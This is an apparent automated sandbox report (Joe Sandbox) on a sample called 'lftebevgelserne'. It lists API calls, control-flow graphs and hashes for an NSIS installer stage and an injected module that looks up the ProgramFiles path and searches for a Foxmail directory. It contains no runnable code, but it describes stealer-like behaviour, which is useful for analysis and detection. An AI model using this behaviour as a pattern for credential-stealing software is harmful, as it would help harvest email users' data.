                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                      • String ID:
                                                      • API String ID: 1083526818-0
                                                      • Opcode ID: 8972919b877bdc29bca3cf50ab0ef026acd41ad9df687fa5a5304e359545c5b1
                                                      • Instruction ID: 4f061b7e490512d185e93fed0248228a6382f7510ffb4cd0fab51124096ebebf
                                                      • Opcode Fuzzy Hash: 8972919b877bdc29bca3cf50ab0ef026acd41ad9df687fa5a5304e359545c5b1
                                                      • Instruction Fuzzy Hash: A221C3B29043196BD710EA649C8CFDB7BACEF88725F100D2AF998D31D0E730E6148796

                                                      Control-flow Graph

                                                      APIs
                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 1F231434
                                                        • Part of subcall function 1F2310F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1F231137
                                                        • Part of subcall function 1F2310F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1F231151
                                                        • Part of subcall function 1F2310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F23115C
                                                        • Part of subcall function 1F2310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F23116D
                                                        • Part of subcall function 1F2310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F23117C
                                                        • Part of subcall function 1F2310F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1F231193
                                                        • Part of subcall function 1F2310F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 1F2311D0
                                                        • Part of subcall function 1F2310F1: FindClose.KERNEL32(00000000), ref: 1F2311DB
                                                      • lstrlenW.KERNEL32(?), ref: 1F2314C5
                                                      • lstrlenW.KERNEL32(?), ref: 1F2314E0
                                                      • lstrlenW.KERNEL32(?,?), ref: 1F23150F
                                                      • lstrcatW.KERNEL32(00000000), ref: 1F231521
                                                      • lstrlenW.KERNEL32(?,?), ref: 1F231547
                                                      • lstrcatW.KERNEL32(00000000), ref: 1F231553
                                                      • lstrlenW.KERNEL32(?,?), ref: 1F231579
                                                      • lstrcatW.KERNEL32(00000000), ref: 1F231585
                                                      • lstrlenW.KERNEL32(?,?), ref: 1F2315AB
                                                      • lstrcatW.KERNEL32(00000000), ref: 1F2315B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                      • String ID: )$Foxmail$ProgramFiles
                                                      • API String ID: 672098462-2938083778
                                                      • Opcode ID: 35928d94e7c47683de9bd16986b386786c09f068b6415907e7190eefc1ea7025
                                                      • Instruction ID: 8e760ebfcfa8790741c373f1c580fb9697af5b4029f9664f149ae60be0264131
                                                      • Opcode Fuzzy Hash: 35928d94e7c47683de9bd16986b386786c09f068b6415907e7190eefc1ea7025
                                                      • Instruction Fuzzy Hash: EE8106B5E1035CA9DB20DBA0DC85FDF7339EF88700F200596F909E7190EAB56A84CB95

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(1F23C7DD), ref: 1F23C7E6
                                                      • GetModuleHandleA.KERNEL32(?,1F23C7DD), ref: 1F23C838
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1F23C860
                                                        • Part of subcall function 1F23C803: GetProcAddress.KERNEL32(00000000,1F23C7F4), ref: 1F23C804
                                                        • Part of subcall function 1F23C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1F23C7F4,1F23C7DD), ref: 1F23C816
                                                        • Part of subcall function 1F23C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1F23C7F4,1F23C7DD), ref: 1F23C82A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                      • String ID:
                                                      • API String ID: 2099061454-0
                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                      • Instruction ID: 9e1e0e34dce58ea48f673e9011b5c5251a5dd3c88c6e2e38b7435604d8bd3b29
                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                      • Instruction Fuzzy Hash: 470126D0DD5F4238A71396770C049EA5FD89A1F663B200756E10087493E960AB02C3A5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 79 1f23c7a7-1f23c7bc 80 1f23c7be-1f23c7c6 79->80 81 1f23c82d 79->81 80->81 83 1f23c7c8-1f23c7f6 call 1f23c7e6 80->83 82 1f23c82f-1f23c833 81->82 84 1f23c872 call 1f23c877 82->84 85 1f23c835-1f23c83d GetModuleHandleA 82->85 91 1f23c7f8 83->91 92 1f23c86c-1f23c86e 83->92 88 1f23c83f-1f23c847 85->88 88->88 90 1f23c849-1f23c84c 88->90 90->82 93 1f23c84e-1f23c850 90->93 94 1f23c85b-1f23c85e 91->94 95 1f23c7fa-1f23c7fe 91->95 96 1f23c870 92->96 97 1f23c866-1f23c86b 92->97 98 1f23c852-1f23c854 93->98 99 1f23c856-1f23c85a 93->99 100 1f23c85f-1f23c860 GetProcAddress 94->100 102 1f23c865 95->102 103 1f23c800-1f23c80b GetProcAddress 95->103 96->90 97->92 98->100 99->94 100->102 102->97 103->81 104 1f23c80d-1f23c81a VirtualProtect 103->104 105 1f23c82c 104->105 106 1f23c81c-1f23c82a VirtualProtect 104->106 105->81 106->105
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,1F23C7DD), ref: 1F23C838
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1F23C860
                                                        • Part of subcall function 1F23C7E6: GetModuleHandleA.KERNEL32(1F23C7DD), ref: 1F23C7E6
                                                        • Part of subcall function 1F23C7E6: GetProcAddress.KERNEL32(00000000,1F23C7F4), ref: 1F23C804
                                                        • Part of subcall function 1F23C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1F23C7F4,1F23C7DD), ref: 1F23C816
                                                        • Part of subcall function 1F23C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1F23C7F4,1F23C7DD), ref: 1F23C82A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                      • String ID:
                                                      • API String ID: 2099061454-0
                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                      • Instruction ID: 710fa2bbc881e91c06965528dad33e9aa3e2da15874784abb156b2607dc7a3db
                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                      • Instruction Fuzzy Hash: A5216BE1CD8B836FE7138B764C047A17FD88B0F262F290696D040CB143E564AA45C3A2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 107 1f23c803-1f23c80b GetProcAddress 108 1f23c82d 107->108 109 1f23c80d-1f23c81a VirtualProtect 107->109 110 1f23c82f-1f23c833 108->110 111 1f23c82c 109->111 112 1f23c81c-1f23c82a VirtualProtect 109->112 113 1f23c872 call 1f23c877 110->113 114 1f23c835-1f23c83d GetModuleHandleA 110->114 111->108 112->111 116 1f23c83f-1f23c847 114->116 116->116 117 1f23c849-1f23c84c 116->117 117->110 118 1f23c84e-1f23c850 117->118 119 1f23c852-1f23c854 118->119 120 1f23c856-1f23c85e 118->120 121 1f23c85f-1f23c865 GetProcAddress 119->121 120->121 124 1f23c866-1f23c86e 121->124 126 1f23c870 124->126 126->117
                                                      APIs
                                                      • GetProcAddress.KERNEL32(00000000,1F23C7F4), ref: 1F23C804
                                                      • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1F23C7F4,1F23C7DD), ref: 1F23C816
                                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1F23C7F4,1F23C7DD), ref: 1F23C82A
                                                      • GetModuleHandleA.KERNEL32(?,1F23C7DD), ref: 1F23C838
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1F23C860
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                      • String ID:
                                                      • API String ID: 2152742572-0
                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                      • Instruction ID: 6c7b5fd07a2d8d89d23c5211cc073c0d2a6552edebc74f25aa08c6f10bccd856
                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                      • Instruction Fuzzy Hash: 52F0C8D1DD5F423CFA1345760C45AF65FDC862F662B201B55E100C7182D895AB0683F5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 136 40326a-40329d SetErrorMode GetVersion 137 4032b0 136->137 138 40329f-4032a7 call 4063f4 136->138 140 4032b5-4032c9 call 406384 lstrlenA 137->140 138->137 144 4032a9 138->144 145 4032cb-40333f call 4063f4 * 2 #17 OleInitialize SHGetFileInfoW call 40601a GetCommandLineW call 40601a GetModuleHandleW 140->145 144->137 154 403341-403348 145->154 155 403349-403363 call 4059fb CharNextW 145->155 154->155 158 403369-40336f 155->158 159 40347a-403494 GetTempPathW call 403239 155->159 161 403371-403376 158->161 162 403378-40337c 158->162 168 403496-4034b4 GetWindowsDirectoryW lstrcatW call 403239 159->168 169 4034ec-403506 DeleteFileW call 402dee 159->169 161->161 161->162 163 403383-403387 162->163 164 40337e-403382 162->164 166 403446-403453 call 4059fb 163->166 167 40338d-403393 163->167 164->163 182 403455-403456 166->182 183 403457-40345d 166->183 171 403395-40339d 167->171 172 4033ae-4033e7 167->172 168->169 188 4034b6-4034e6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403239 168->188 184 4035b7-4035c7 call 403789 OleUninitialize 169->184 185 40350c-403512 169->185 177 4033a4 171->177 178 40339f-4033a2 171->178 179 403404-40343e 172->179 180 4033e9-4033ee 172->180 177->172 178->172 178->177 179->166 187 403440-403444 179->187 180->179 186 4033f0-4033f8 180->186 182->183 183->158 189 403463 183->189 205 4036ed-4036f3 184->205 206 4035cd-4035dd call 40575f ExitProcess 184->206 190 4035a7-4035b3 call 403863 185->190 191 403518-403523 call 4059fb 185->191 193 4033fa-4033fd 186->193 194 4033ff 186->194 187->166 195 403465-403473 call 40601a 187->195 188->169 188->184 197 403478 189->197 190->184 209 403571-40357b 191->209 210 403525-40355a 191->210 193->179 193->194 194->179 195->197 197->159 207 403771-403779 205->207 208 4036f5-40370b GetCurrentProcess OpenProcessToken 205->208 215 40377b 207->215 216 40377f-403783 ExitProcess 207->216 212 403741-40374f call 4063f4 208->212 213 40370d-40373b LookupPrivilegeValueW AdjustTokenPrivileges 208->213 217 4035e3-4035f7 call 4056e2 lstrcatW 209->217 218 40357d-40358b call 405ad6 209->218 214 40355c-403560 210->214 232 403751-40375b 212->232 233 40375d-403768 ExitWindowsEx 212->233 213->212 221 403562-403567 214->221 222 403569-40356d 214->222 215->216 230 403604-40361e lstrcatW lstrcmpiW 217->230 231 4035f9-4035ff lstrcatW 217->231 218->184 229 40358d-4035a3 call 40601a * 2 218->229 221->222 227 40356f 221->227 222->214 222->227 227->209 229->190 230->184 235 403620-403623 230->235 231->230 232->233 236 40376a-40376c call 40140b 232->236 233->207 233->236 238 403625-40362a call 405648 235->238 239 40362c call 4056c5 235->239 236->207 247 403631-40363f SetCurrentDirectoryW 238->247 239->247 248 403641-403647 call 40601a 247->248 249 40364c-403675 call 40601a 247->249 248->249 253 40367a-403696 call 40603c DeleteFileW 249->253 256 4036d7-4036df 253->256 257 403698-4036a8 CopyFileW 253->257 256->253 259 4036e1-4036e8 call 405ebb 256->259 257->256 258 4036aa-4036ca call 405ebb call 40603c call 4056fa 257->258 258->256 268 4036cc-4036d3 CloseHandle 258->268 259->184 268->256
                                                      APIs
                                                      • SetErrorMode.KERNEL32 ref: 0040328D
                                                      • GetVersion.KERNEL32 ref: 00403293
                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
                                                      • #17.COMCTL32(00000007,00000009), ref: 004032DF
                                                      • OleInitialize.OLE32(00000000), ref: 004032E6
                                                      • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
                                                      • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
                                                      • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 0040332A
                                                      • CharNextW.USER32(00000000,00434000,00000020), ref: 00403351
                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                      • GetTempPathW.KERNEL32(00000400,00436800), ref: 0040348B
                                                      • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040349C
                                                      • lstrcatW.KERNEL32(00436800,\Temp), ref: 004034A8
                                                      • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 004034BC
                                                      • lstrcatW.KERNEL32(00436800,Low), ref: 004034C4
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 004034D5
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 004034DD
                                                      • DeleteFileW.KERNEL32(00436000), ref: 004034F1
                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                      • OleUninitialize.OLE32(?), ref: 004035BC
                                                      • ExitProcess.KERNEL32 ref: 004035DD
                                                      • lstrcatW.KERNEL32(00436800,~nsu,00434000,00000000,?), ref: 004035F0
                                                      • lstrcatW.KERNEL32(00436800,0040926C,00436800,~nsu,00434000,00000000,?), ref: 004035FF
                                                      • lstrcatW.KERNEL32(00436800,.tmp,00436800,~nsu,00434000,00000000,?), ref: 0040360A
                                                      • lstrcmpiW.KERNEL32(00436800,00435800,00436800,.tmp,00436800,~nsu,00434000,00000000,?), ref: 00403616
                                                      • SetCurrentDirectoryW.KERNEL32(00436800,00436800), ref: 00403632
                                                      • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
                                                      • CopyFileW.KERNEL32(00437800,0041FEA8,?), ref: 004036A0
                                                      • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FC
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403703
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
                                                      • ExitProcess.KERNEL32 ref: 00403783
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                      • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                      • API String ID: 2488574733-3195845224
                                                      • Opcode ID: a996e24322ab931b25b24e828b6ef98328f30ad14b7f21a8712b1f312c2e0a74
                                                      • Instruction ID: 73295983c26b9bc795aacbdf710e3d5853a553e8a558082b103844ae68e0e3ab
                                                      • Opcode Fuzzy Hash: a996e24322ab931b25b24e828b6ef98328f30ad14b7f21a8712b1f312c2e0a74
                                                      • Instruction Fuzzy Hash: C3D1F470644200BBD720BF659D45A3B3AACEB8074AF10487EF541B62D2DB7D9D42CB6E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 320 404af5-404b41 GetDlgItem * 2 321 404d62-404d69 320->321 322 404b47-404bdb GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 320->322 323 404d6b-404d7b 321->323 324 404d7d 321->324 325 404bea-404bf1 DeleteObject 322->325 326 404bdd-404be8 SendMessageW 322->326 327 404d80-404d89 323->327 324->327 328 404bf3-404bfb 325->328 326->325 329 404d94-404d9a 327->329 330 404d8b-404d8e 327->330 331 404c24-404c28 328->331 332 404bfd-404c00 328->332 337 404da9-404db0 329->337 338 404d9c-404da3 329->338 330->329 334 404e78-404e7f 330->334 331->328 333 404c2a-404c56 call 4040de * 2 331->333 335 404c02 332->335 336 404c05-404c22 call 40603c SendMessageW * 2 332->336 376 404d21-404d34 GetWindowLongW SetWindowLongW 333->376 377 404c5c-404c62 333->377 343 404ef0-404ef8 334->343 344 404e81-404e87 334->344 335->336 336->331 340 404db2-404db5 337->340 341 404e25-404e28 337->341 338->334 338->337 349 404dc0-404dd5 call 404a43 340->349 350 404db7-404dbe 340->350 341->334 345 404e2a-404e34 341->345 347 404f02-404f09 343->347 348 404efa-404f00 SendMessageW 343->348 352 4050d8-4050ea call 404145 344->352 353 404e8d-404e97 344->353 355 404e44-404e4e 345->355 356 404e36-404e42 SendMessageW 345->356 357 404f0b-404f12 347->357 358 404f3d-404f44 347->358 348->347 349->341 375 404dd7-404de8 349->375 350->341 350->349 353->352 361 404e9d-404eac SendMessageW 353->361 355->334 363 404e50-404e5a 355->363 356->355 364 404f14-404f15 ImageList_Destroy 357->364 365 404f1b-404f22 357->365 368 40509a-4050a1 358->368 369 404f4a-404f56 call 4011ef 358->369 361->352 370 404eb2-404ec3 SendMessageW 361->370 371 404e6b-404e75 363->371 372 404e5c-404e69 363->372 364->365 373 404f24-404f25 GlobalFree 365->373 374 404f2b-404f37 365->374 368->352 381 4050a3-4050aa 368->381 394 404f66-404f69 369->394 395 404f58-404f5b 369->395 379 404ec5-404ecb 370->379 380 404ecd-404ecf 370->380 371->334 372->334 373->374 374->358 375->341 383 404dea-404dec 375->383 382 404d3a-404d3e 376->382 384 404c65-404c6c 377->384 379->380 386 404ed0-404ee9 call 401299 SendMessageW 379->386 380->386 381->352 387 4050ac-4050d6 ShowWindow GetDlgItem ShowWindow 381->387 388 404d40-404d53 ShowWindow call 404113 382->388 389 404d58-404d60 call 404113 382->389 390 404dee-404df5 383->390 391 404dff 383->391 392 404d02-404d15 384->392 393 404c72-404c9a 384->393 386->343 387->352 388->352 389->321 402 404df7-404df9 390->402 403 404dfb-404dfd 390->403 406 404e02-404e1e call 40117d 391->406 392->384 397 404d1b-404d1f 392->397 404 404cd4-404cd6 393->404 405 404c9c-404cd2 SendMessageW 393->405 398 404faa-404fce call 4011ef 394->398 399 404f6b-404f84 call 4012e2 call 401299 394->399 407 404f5d 395->407 408 404f5e-404f61 call 404ac3 395->408 397->376 397->382 422 405070-405084 InvalidateRect 398->422 423 404fd4 398->423 428 404f94-404fa3 SendMessageW 399->428 429 404f86-404f8c 399->429 402->406 403->406 410 404cd8-404ce7 SendMessageW 404->410 411 404ce9-404cff SendMessageW 404->411 405->392 406->341 407->408 408->394 410->392 411->392 422->368 425 405086-405095 call 404a16 call 4049fe 422->425 426 404fd7-404fe2 423->426 425->368 430 404fe4-404ff3 426->430 431 405058-40506a 426->431 428->398 434 404f8e 429->434 435 404f8f-404f92 429->435 432 404ff5-405002 430->432 433 405006-405009 430->433 431->422 431->426 432->433 437 405010-405019 433->437 438 40500b-40500e 433->438 434->435 435->428 435->429 440 40501e-405056 SendMessageW * 2 437->440 441 40501b 437->441 438->440 440->431 441->440
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B0D
                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B18
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B62
                                                      • LoadBitmapW.USER32(0000006E), ref: 00404B75
                                                      • SetWindowLongW.USER32(?,000000FC,004050ED), ref: 00404B8E
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA2
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BE8
                                                      • DeleteObject.GDI32(00000000), ref: 00404BEB
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D26
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D34
                                                      • ShowWindow.USER32(?,00000005), ref: 00404D45
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EBC
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE0
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F15
                                                      • GlobalFree.KERNEL32(?), ref: 00404F25
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405047
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
                                                      • InvalidateRect.USER32(?,00000000,?), ref: 00405076
                                                      • ShowWindow.USER32(?,00000000), ref: 004050C4
                                                      • GetDlgItem.USER32(?,000003FE), ref: 004050CF
                                                      • ShowWindow.USER32(00000000), ref: 004050D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 1638840714-813528018
                                                      • Opcode ID: d25dd17f0ef4f42499fd80d9816131724b7700db04961f8c60a4f0c198e52f9b
                                                      • Instruction ID: 2f8963ba0b06e8e3d6cb077b811a33c65d2f4829f178f5176880c359a33aa38b
                                                      • Opcode Fuzzy Hash: d25dd17f0ef4f42499fd80d9816131724b7700db04961f8c60a4f0c198e52f9b
                                                      • Instruction Fuzzy Hash: 1D026FB0A00209EFDB249F54DD45AAE7BB5FB84314F10857AF610BA2E1C7799D42CF58
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,75573420,00436800,00000000), ref: 00405834
                                                      • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,75573420,00436800,00000000), ref: 0040587C
                                                      • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,75573420,00436800,00000000), ref: 0040589F
                                                      • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,75573420,00436800,00000000), ref: 004058A5
                                                      • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,75573420,00436800,00000000), ref: 004058B5
                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
                                                      • FindClose.KERNEL32(00000000), ref: 00405964
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: \*.*
                                                      • API String ID: 2035342205-1173974218
                                                      • Opcode ID: b22725c9d1379137a20526b6b5dca3a9dfa803cbd6e10eb7e01ed1832fa3af48
                                                      • Instruction ID: b6454d918ebd5faba2d20934ef042a1c7892e73fe5aa147b237895e66f915a66
                                                      • Opcode Fuzzy Hash: b22725c9d1379137a20526b6b5dca3a9dfa803cbd6e10eb7e01ed1832fa3af48
                                                      • Instruction Fuzzy Hash: 0041BF71900A14FACB21AB658C89EBF7678EB41768F10817BF801751D1D77C4981DEAE
                                                      APIs
                                                      • CreateDirectoryW.KERNEL32(?,?,00436800), ref: 0040568B
                                                      • GetLastError.KERNEL32 ref: 0040569F
                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
                                                      • GetLastError.KERNEL32 ref: 004056BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
